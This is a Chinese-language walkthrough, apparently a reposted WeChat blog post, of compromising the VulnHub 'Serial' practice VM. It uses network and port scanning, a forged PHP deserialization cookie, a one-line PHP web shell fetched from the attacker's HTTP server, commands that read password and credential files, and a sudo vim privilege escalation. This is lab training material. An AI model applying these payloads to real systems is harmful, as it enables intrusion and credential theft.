本周实践的是vulnhub的serial镜像,
下载地址,https://download.vulnhub.com/serial/serial.zip,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.220.0/24,
获取到靶机地址是192.168.220.171,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.171,
发现靶机有22端口的ssh服务和80端口的http服务,
接着对http服务做路径扫描,dirb http://192.168.220.171,
发现http://192.168.220.171/index.php,
和http://192.168.220.171/backup,
浏览器访问http://192.168.220.171/backup,
下载压缩包,wget http://192.168.220.171/backup/bak.zip,
解压,unzip bak.zip,查看文件内容,
在user.class.php文件里添加内容,
echo base64_encode(serialize(new User('admin')));
执行php user.class.php,获取到编码后的Cookie,
在log.class.php文件里添加内容,
在user.class.php文件里修改内容,
再次执行执行php user.class.php,可获取到本地密码文件内容,
并更新了编码后的Cookie,
用burpsuite浏览器访问http://192.168.220.171/index.php,
把请求转到repeater,
把Cookie换掉,获取到靶机的密码文件内容,
kali攻击机上准备一句话木马,vim shell.php,
<?php system($_GET['cmd']); ?>
开启http下载服务,python2 -m SimpleHTTPServer 80,
在log.class.php文件里修改内容,
再次执行执行php user.class.php,再次更新编码后的Cookie,
用burpsuite浏览器访问http://192.168.220.171/index.php?cmd=ls /
获取到文件credentials.txt.bak,
继续用burpsuite浏览器访问http://192.168.220.171/index.php?cmd=cat /credentials.txt.bak,
获取到用户名密码,sk4:KywZmnPWW6tTbW5w,
ssh登录靶机,ssh [email protected],
sudo -l发现vim有root权限,去GTFOBins查提权方法,
提权sudo vim -c ':!/bin/sh',id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之serial的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论